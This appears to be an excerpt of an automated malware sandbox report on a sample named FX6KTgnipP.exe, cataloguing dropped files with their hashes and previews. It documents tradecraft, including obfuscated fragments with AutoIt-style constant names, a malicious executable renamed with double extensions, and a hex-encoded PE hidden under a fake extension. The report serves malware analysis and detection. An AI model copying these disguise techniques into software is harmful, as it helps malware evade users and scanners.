                                                                                                                                                                          Preview:332lFM2x2NllOg8uVJxv07m415h8C88zg3046F37gm939IJQdn1a3ixB0W7A447R79ZooS378899g849RD6DM7tpl5k0Qmu47c406oT8MVKd302c32Wp1388J1323..FontConstants ToolTipConstants..J9p8m02lSu2u9..BorderConstants FileConstants..455E5hrXja2e0925DI6NX71iFP80Wd0233XOv9IT7h4b8R5698a2s4JJI4391fw5e764oL49..ToolTipConstants StructureConstants..G336eG1..GuiDateTimePicker UpDownConstants..eL19MNlp521cG099380G113eu5Qh4406QeA2xa4bH..ToolbarConstants ComboConstants..G0Pf5QB27s1L80G3N3yp76Rl4069cABR6k505XF0tK334bI26E6T1rat8NnarfW9s0qe11bhJ4C532568b2N36JG0U6G639PF75q7870980WmYZra21iV2..UpDownConstants ColorConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\knbn.pdf

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):534
                                                                                                                                                                          Entropy (8bit):5.548868164848912
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:01tYzTAZz1Nlb/9qdjmiLxRe+rzTgY4cDRt:0GzENqVma4KkcDRt
                                                                                                                                                                          MD5:7344C1EEB4D095D912F00313EED97FCA
                                                                                                                                                                          SHA1:7D042BE887275C1F43587392790162A112EB9A75
                                                                                                                                                                          SHA-256:89DCFB4C9CB90652FDE7BFDBCAEC065884AE78EBA8C6A6E4EDC5858C9CD68A8A
                                                                                                                                                                          SHA-512:F7DFD3E81215925D4E30F3919B6EBE59716C7AFC3D2C7B8189AD65D2B87887D64D7AC1C5364262997E0779B838D875C475E92BB7145972BCBEE66E63466CEE18
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:CuGf5Vu..ToolTipConstants ToolTipConstants..a3065XM8203EL31Q552nZtEzF7i299mhw90uTXYDosyvHrfg58oqa04RNlPya1Srw0M3G8vY2yjJ79R7bObm6d83VDckk1435YXO06419K3Xh4eIC61J6Dg5koKZx1g3y91bt0P159288pyx3H5098404rF531..UpDownConstants DateTimeConstants..1i008ZU4d18aL0W43u5dCA7183408Z5UB75VE748e0F3COGa3Tt78952oUvbm1Npey262Pbo8t7EZd66AT33oIdAOwA5T6du4L4e13JKu065C761MlY..BorderConstants BorderConstants..4544k6PF..ButtonConstants FileConstants..JE4X8q368an7F56E4010js307KbH1p68E06QP1Ac20w579bs24F87l5bTasxzq600006632..ComboConstants ColorConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\ktdbcsgrn.pdf

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):533
                                                                                                                                                                          Entropy (8bit):5.501265161514424
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6:kv9Rk0zcyFScOLWIq/lfU+jLWrrn67IUVeEdHPMhqSmV3AdRPhlHQ1God2jLWsd:kv9RvPmAlfpUPmeyKMVIbZQ1GoMt
                                                                                                                                                                          MD5:B3CCD694F1B2FA026EEA14F99C937B4D
                                                                                                                                                                          SHA1:849EE473B2324105DE4B579C83B94462DD3B4A12
                                                                                                                                                                          SHA-256:5D283D575AD01917B9EEB874C5E2F491DEFC8F37A2055A51EDC6A5A83CB8CBB0
                                                                                                                                                                          SHA-512:BB7D22E22477A6A719F958DF4183CB617455073F11DEA7DBAB9749BCEDAF015F80A9AB0ECEC83C262FC573F344748FB558672B22A42E2E045F15D6CFCBE4FEF9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:906356z9ijC2e7BQu791h623J0k8SL1zl3d0961D6M75949PGUPc2T526k..TreeViewConstants DateTimeConstants..MIL89j5nV31674299KP33d9270l5Uu881Vo..DateTimeConstants UpDownConstants..x407jC710652Y03Z4R6mP..GuiDateTimePicker GuiDateTimePicker..6YFEn11kU46FVS4E4kjTpem55rnRo91Jmg8o1BO6R32K740NXOnRn51241x70cTx4k3X5N73CJj94Rve74JH3E8JA4w12wGt2j92G6rX2tC1Tn485824L1jV8h080T8Q81069l679n23..ToolTipConstants UpDownConstants..7D2vq9A9047wyH169B60KRE..FileConstants ToolbarConstants..9y3587P171dlim8581kv65s8Wp5B2q43R9V..DateTimeConstants ColorConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\ldwf.mp3

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):513
                                                                                                                                                                          Entropy (8bit):5.577482789689521
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:R/6fU4RxHsafRmsPKUIAmAZX8Ycg5EZ3cB5yF:R/6zMasIDcnZIIF
                                                                                                                                                                          MD5:21AE6A7F523DCDB5FD7563F31BC90559
                                                                                                                                                                          SHA1:8C725669946D1F43953ACFEE7C1979822DDB6383
                                                                                                                                                                          SHA-256:64FE0E4E963C75063AA72B0F7812251AA649C83026D21175EA1787BF578AC44C
                                                                                                                                                                          SHA-512:2E8E360690D688DE5DBE82D438122D9071243E3D893F08A9A019488EA222942381863F4253F2B5C55824198413356F810F8592992F5FD7C60E011ACEEC5E5F26
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:omC3psp75oku7rS6P9pGVk3h0W71JBPT0lMdU6iCR203s6p9XS3iP59dcV0tPh8ipr9bB9qaZ49qK6eH184Vd..FileConstants BorderConstants..p1nW6Q75173O8W28XBekVyjVZNu46j..GuiDateTimePicker ButtonConstants..jb70q501AVG54f9..ToolbarConstants ColorConstants..w07086134yauY3761k0F0LmYiY57ccxnq5M73W1P6Y393dfU37910N7F9dMqhXRpQ775DW69DE2594os70364wd..ButtonConstants ToolbarConstants..6N4p41G05GLnm667U05o66O11Z0y00W93Z9b8944h84B6L7A661LF13g1v0q19471d6QA4Io5oGzmdA554Q295632727CT1G10qxW1QEZryfqH3258Y1F2Opz..FileConstants ToolTipConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\lkfsftdl.icm

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):629
                                                                                                                                                                          Entropy (8bit):5.4666634467841275
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:xTIhETVFPzys1Jk0F3A/qSvJhqit54IvLAW:xae64uy3A/qcJjR/
                                                                                                                                                                          MD5:40B63329BF087953369FE3DE16919B80
                                                                                                                                                                          SHA1:1FE7ECCDB003E34310A3BCCBA863A144F0580F4C
                                                                                                                                                                          SHA-256:0C2EDB2430D54BFD603A371749C042B18B4D7F9F18CC3853EDF583914CB5E438
                                                                                                                                                                          SHA-512:2EDDC811D1C979D2698166F25B17B82D67A993E20B4E9AB169275DAD9E425F2FCECCF3E9CCAB16F212DF53F1705EB1E528510A826AF571C73255C3EC9BAE3B2C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:Tw8340E42949L0168b4hs0y5o3EGhC79kIWo4Qik6GY7702..BorderConstants ColorConstants..34PvWaR..TreeViewConstants ButtonConstants..y21w3088e4T25Ty5O8muSo5zqu270CI42048L8lC433xDRky17t9922P23qEoR60JO44q8ax02t4Z61t3Nxhxq2H0dl5vh62198psz8n65Xl..FileConstants ColorConstants..P280D33N1RlP004pB7QBi85shBaK4yRB002909h5Q54J23Nlp0732iB2S6j2Nu28201BM039w456MyQb79Lt6Z0hcNd910253fx0W82504Y5O4Y1S35o3862DPX..BorderConstants ToolTipConstants..y7jvlFx9Pbm26X679503L9e8Tj8C1za33i80qMg6n67bdHkH62j57428246R77332o4588GwdwW3887VE9730K6Pl425snk147PqB2i3x581552Y22v00D29d02M2f3Nu2D4d2o4066342N6Sf10ufE929912m8ts34101YFwkc..ButtonConstants ComboConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\mufaixfa.mp2

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):598
                                                                                                                                                                          Entropy (8bit):5.59934887046669
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:7NGrT9Qjj8C7kJhQhz8lokTP2jQv25qdM7BKATkRh8p/1Gj/Ll1R/diTM:BETyjj87vQhz8gGfIBKATCE1ur/db
                                                                                                                                                                          MD5:D181B371EED7ECFD2FEB22601E015CAE
                                                                                                                                                                          SHA1:224861B9E9C3AAD2A3D189B06487511AD9DA8C7F
                                                                                                                                                                          SHA-256:DEE002A09347837FB5DC5368763DEE8B516B8E27D17935EEB73FB2A7F4D2A220
                                                                                                                                                                          SHA-512:0738520DAEBF468AC5B2FA71D3596F6ABD5956EC7A12391E16E8257DC5042E58040C8713125A8F62FD795862D080C00CAA758A7470DE4CAD779257E37510491F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:Q9Gj6b4B76us56e8C5C7yGx1690k3k2F5729AiH4988n648MpM80O15vjs3Ds9FZG537F759599Kh59PEUT0p4H02WNkqA7G257q1PN2u87m42nbh0X0L54465r887..StructureConstants FileConstants..A0nr3339140H54iJSwPfqQf11Tkr7Q8O889398HNRta53JPdx8qC..TreeViewConstants ToolbarConstants..53LP3IDvFbR5J80tYGzKy30Q7vAkf8NHDZ49h6h556FtA19JMc0KK174L7JE6o1s46ab954I33TNF43w1vk02300hd3GX67hFI74g4230ySQA476F6q3G41E..UpDownConstants UpDownConstants..3O5O08fF72u642b62eJDgydBJ1QmGstr4r48B6qg115J21407AHX72W599XnP50yd31401N2734n6S4P1Jzj07AE4ChlZ552T20hH6jG4oW345aA4MqxCH310f54Kp2sW7n78J3igD5yi28GJn3a5f287141d..ComboConstants UpDownConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\ovvav.msc

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):596
                                                                                                                                                                          Entropy (8bit):5.5447068455678234
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:w9Xf8t2eoxhWf1SOK0IQO/0dWqMpEzaa6mAcxN0:w9Xs2eoGf0jQO9pEzHhAON0
                                                                                                                                                                          MD5:4F1DAD84085CD5BE9D40662DDE2CC6C2
                                                                                                                                                                          SHA1:D0E8632CDBA8D2B0D2B7F35929E1BB9BDDC2D426
                                                                                                                                                                          SHA-256:490E821B0B1933343886DF46521788A015FBA608E67DD325BF5C861D7E21C358
                                                                                                                                                                          SHA-512:48011F6F7A5A451AB342F30A5FD10D64B729868D251E65A249ABC436CE032959CFD05D1FB19B57D8CBD858994DEE9408AB1881D4DDD393B399330587A90DA578
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:Uo4E3Z7tyK..ToolbarConstants GuiDateTimePicker..Ov791uT433ag28M22S9zI815SwG688bb25O771N952n6kNm5V62Ko759pr64B0xWs5KM930076921K..ToolbarConstants DateTimeConstants..bi6M2DZf8xQHXx076Z3V6B4381J3293730ZY0aG27P4owJsPbo900c08fTDG9WHUtl840XGCvvCm97p04Qr49O4q19..FontConstants UpDownConstants..M9nwG09g2QJ09oj6uhP2ii81xs4W1443S6b3559wH1r89Y7eP162tUf6sfY3a2034u95P06680g358..ButtonConstants UpDownConstants..P5Q2HZ38196s3mf52k2LCoEnYj7M73P2V4s14n335689yQkA2114i6440TcTsD5MC5vAR64380d10IBrf42i55qJbWFdO56K9SUevxN4008vstI0O8b392fSx72o2c0a200k9WW6611y90EAPX3Xw39L4226b8759..ButtonConstants BorderConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\stke.jpg

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):571
                                                                                                                                                                          Entropy (8bit):5.5797013585600395
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:/HC1eTxrZxShOn8V9rfIrWum3deZ+3Sb/GM1BPc:/i1e1rf5n49rQWn3wcQBO
                                                                                                                                                                          MD5:701A40E797BF193BF1B078ACC8B08D8F
                                                                                                                                                                          SHA1:9AAA897C2EB6C09F60887020D6E0E6FB6793D1E7
                                                                                                                                                                          SHA-256:81883C3AF3BC76D202A2E2A499627B13D09CD7E3EBFF443BF854329BCFB9A3A9
                                                                                                                                                                          SHA-512:8E4946C3FC21D77F3BC267287D202804BDD38C501446EA008F65718A3BDBF5FC05AE3443336BF7A7D3CB60EB473B6CFD29F63D8DA1D8C43FBAB9A9B35E5BB136
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:4M4e123y813Q909y5o4L4sQv31qckhv715v3p88N22222pODEo3h69YXF4694361vw092IICqIgJD44aP7z4715o3T350RO84r0jsD664HhTeZ7vA5Z721L582LkS..FileConstants ColorConstants..jSGz6f4AGJ2k6ycRm79zywdOa5b640F01Z7w44xG61e8r11Z75qOyz64305NA9jV974y4222S5V5Q8W111yw0QM..ToolbarConstants ButtonConstants..3T6lSlO1kBqPR640E13B88B72GH9345392uId456352i0o29pVr508..BorderConstants DateTimeConstants..B7w33pKO5lfUU978g73buN8lCv4..DateTimeConstants FontConstants..9059j2hH51CowjY9cKcSn2X0p7335p172t2031wps95E76H7562DT3V52Fdel361931g0G714dwM68VUfw180Zxc9LBM954jhG64..ToolTipConstants TreeViewConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\tdggoffi.bin

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):126003968
                                                                                                                                                                          Entropy (8bit):7.032325966137812
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:196608:VuJdrXFG9geFdXFEq2JXYLsAU62B+HkeCKjdTuSuth8gidLIwyYXE24jcg1hSng3:u
                                                                                                                                                                          MD5:3F7DDC4ECBDAF26A3CA18881DBCB0444
                                                                                                                                                                          SHA1:87B7AD58BB268E450C8F6A3DA3A9BBF782F7293A
                                                                                                                                                                          SHA-256:2077070EC9BD352469129F6AA8CAF53BE0E4A9ED642BE8258203B428CE6FEC21
                                                                                                                                                                          SHA-512:A66A60C3034519442DE13C3A4D02F4135D54B1FE971A8B994C5CD525603B5C77B5EBF8276A665FE5B97D157C637587E981556C2C5CFD4504ADE37667059439C7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;....H...,u.L.{2.33..P...+qQFp$.k......,hL...1.%(.o.HH.....m...4K.F...@.%y.b........@j.D./.@'.O.h#.ncK>...g..\......l7...`!....N.....#.c.s..n..@...r).2.......(....4. .l...........0.(....,...>...F....1.Bq..........x.....y.~..9....}/.\....u..go..8.~.j.e.......*pq..:....*z..Q.B.@..6_.. ..........V..}...8h@@.b.c...K.n..}.u.uF.}I.....qH.$:Z1.=........*....{..b`.X.......Y...?dz..3XA4....+...e...G.B_E.].I..?.........5W.|.....J....P1.R.s...!...e..3.F.Z....f.q_.!..y...fw......'.@.'D.K..O.....`.{........{..M....y!...........jE*....p.9......X$.G.'....f.Y....$..V....{N......6.l.$..$.O....r.B..4H!.............*.C..36N........}...X.+.....Z....."..9....y....[9h..sQhA.w..3..z.A,.<....f......y..A....^p..L.c+....?t+....%S=3_g.6.i..{.d8.'2.k*Lq[....^"...O.h.....s/...<.1A;.4.5=hA..........;aa....2.t.c.c.....F.K.c.h.6.8.8.w.H.R.N.y.0.G.8.2.f.a.6.W.l......4.6...U/1R?.b$..n...5@.......8.1.M.4.d.1.B.m.i.C.s.X.6.8.x.6.7.3.5.u.T.8.5.2.1.N.9.t.R.4.9.B.7.1.s.4.c.j.

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\uauxqmpgfc.ppt

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):517
                                                                                                                                                                          Entropy (8bit):5.63557700637518
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:cd1SzN8jzwOsy6prpGbfGSEybsw8RedLjPERsASXmv:cizVOMrpGbfGFGeRuEAWv
                                                                                                                                                                          MD5:FF1863DA6E6FD356E9EB8B8A2D2C5B12
                                                                                                                                                                          SHA1:10B8480E705597FB75BCA8C23ED0739B49500A8B
                                                                                                                                                                          SHA-256:6FBA20CB3849CF46B768F3BA627B3673D2C4B3B66AD2E994D245024C4E729366
                                                                                                                                                                          SHA-512:28B019D426893E2ACD7526FCB6B09575A904AA3B06AB4F34588C455D4394DED61905F0A2A01A6FE1DD1053562A3F2C181719310F260A61E62D4E3AAD996C998B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:K75x8q9NtB50320T004H5mm2bfhu8LrSxM96L6680os0Ew1i71K6rTuDjgmq1P9x48KlM5uuq961sAmlDYAK23JQ16Kp3a0KTrw27rM69M91Hg56Lmm0Us7jPNpx0fGOSl72f9r8R90HA10T926R2q8801U..ToolbarConstants ToolTipConstants..7h6dCeH6F9A1518Ule16d2kd0016uXhz8W96ui326688RQ6q5673x91Q8G4I5I8VU4z59cyX5Pj..ButtonConstants ToolTipConstants..i6T20z4ldGcO250jK8z125DexY491zz2Yp6o8DEJKjP0070Gn1Tl89dW8q382s2..GuiDateTimePicker TreeViewConstants..7nKaUWw9I016671K43N5k51V14ZeNSj308671fD8i01P45pv1M83nudu2D6jC43xa283gk00M..GuiDateTimePicker GuiDateTimePicker..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\oqck\acqrc.dhq

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):571495
                                                                                                                                                                          Entropy (8bit):4.050101452531791
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:S8+nw3X1oeYXD39Gp74IazTb9A/OZBWxCcY5Nydt:sRe+DtU7FapA/Ork
                                                                                                                                                                          MD5:4F363A080CC5B7DF87865134BEA5A5A8
                                                                                                                                                                          SHA1:186AE3A77464644CDA4D0088F2FE47CADA63C411
                                                                                                                                                                          SHA-256:3EB7D48ECC57056FD63D437C73E2D97004D83C3F81D9D12FD59F9BD02BAEB47F
                                                                                                                                                                          SHA-512:C35F1CE633482418B2FD23D6FAA4FCEB118F90C9C08106E5DAF5E65DFFF81F73FC1B76BFE910A1B3C861EAA3614C07A9A50745A4226FB775C0D7D05FF1D8FAEC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]0_8]]]0E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]790/09*03D6067F33D6067F33D6067F3/**6*8F33*6067F3/**6**F33C6067F3/**6*_F33C6067F3526963683D6067F3]]]]]]]]5045]]4C0/0/]63D64256]]]]]]]]E]]20/0_0/0_]]5*04]]]]]]]]]80/4]]]/]]]07]4]]]4]]0/]]]]2]]06]]]]]]]06]]]]]]]]7]4]]02]]]]]]02]408/]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]02E74657874]]]445804]]/]]]05*04]]/]]]]]]]]]]]]]]02]]06]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\oqck\ancoicoift.bmp

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):511
                                                                                                                                                                          Entropy (8bit):5.583899771066972
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:huQQOtj+dGlIPpUbLUFfw6CaVWrYjlDQQ8DfGvebBPc:hQOtjvlKU/5CESeQ8D+mO
                                                                                                                                                                          MD5:9A38130722412B3DA7C8F01FA3951543
                                                                                                                                                                          SHA1:E6E5082B8258ABF0E4DE8FA3A9D78FED8113F59C
                                                                                                                                                                          SHA-256:1FF428831F3EE3453A0AAD13851CCDA311A940876D94000AE62D499108C96A19
                                                                                                                                                                          SHA-512:C73C6634394D94EB71F54E4B3A1EA1E36167FD6EB9110FB55588DBB84C774B3449BDF00B337E8B6C0EE6DA84D85C03A2F40484961952C159CF1EC5FFB765DB99
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:5q2A2O796KAgcG98e3NeBZEC1lwSd8Qf37me1Im9Fvx163Ov1yfg9R923f56Fm6N42RlI821InB282sXH50V83VKW044MC87py..TreeViewConstants FileConstants..N63G44tQ9467ucc70p7b15dOTt0N9EGV7mgCj744c8..ComboConstants ColorConstants..854bz5a6501V1120282hghi3NNN58s9fr623bYfp5r6U2nod1VC5312ST113rrJjbw5H3zcF2xE309Y300pId5W0q1i6Ew06m4902GNm0Tu594124w9hm08v15vuG06mC2..GuiDateTimePicker ButtonConstants..fi288Es299f1319D06JRcuZuu197MtI2nm58Z0m81Enn4r27965I6qKM955hM5126n30RLXZr0QfZ2x7SL9005oakc2s1785t7nO..ComboConstants TreeViewConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\oqck\bxwre.xls

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):537
                                                                                                                                                                          Entropy (8bit):5.704572179774912
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:xN2Al1FkxT2BjNPEkcmXKw1fV412W/hiUnxHja:72AvGxmjJEkF6Gte/hiUn0
                                                                                                                                                                          MD5:24BE41947CD248379C4BF3376C7B512D
                                                                                                                                                                          SHA1:D672DCAD8399813B4D725A4FACBEDF7C06C232C9
                                                                                                                                                                          SHA-256:FBE9B125387CEE3486E264D3181353BFFDD19DBE3D5CCB727A64EF8A10226F12
                                                                                                                                                                          SHA-512:EF3636C77ACB4BE60CCBD282A0C18CEC38C295FEC56DD0571CCF21E429145F697023B805A1D62385558907B632A3DB0A3EB66B2FD1B96DB85577498D53C35B2E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:JPN8BqP1130W86wL472KJy..BorderConstants BorderConstants..bmRb126IZBP84477A4NA5eBx3226z4DFTo8CU1E9722Hmp818ce342VX3sXsTY44kdY8i8nHGv743o9FHI8d5LNv04J1v1G5488JuyN52z0PXx27w2nQ3LV95f6SUkN086G682oo6S3R28kF8456xsI4g8vCdal73985mUJ962521A9i9N3Ar8lK22a9YRiW9nQf..GuiDateTimePicker GuiDateTimePicker..jp9f..GuiDateTimePicker DateTimeConstants..V8jm85c6fl1OqU379K2r3572420MJ38LR262U794943b6Kpk3v0m7HKy75kE4rs1EGaYtn6UH2M00hb2XxccLz9oK4li660k898G1c0OY8b3a8E79KhTZhRf8Zo8yO44d38NG7o5493eOxl9J9FEsmX60y2MIvVJIP8S..GuiDateTimePicker ToolTipConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                          Entropy (8bit):6.629681466265794
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                                          MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                                          SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                                          SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                                          SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                          Entropy (8bit):6.629681466265794
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                                          MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                                          SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                                          SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                                          SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe.exe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                          Entropy (8bit):6.629681466265794
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                                          MD5:0ADB9B817F1DF7807576C2D7068DD931
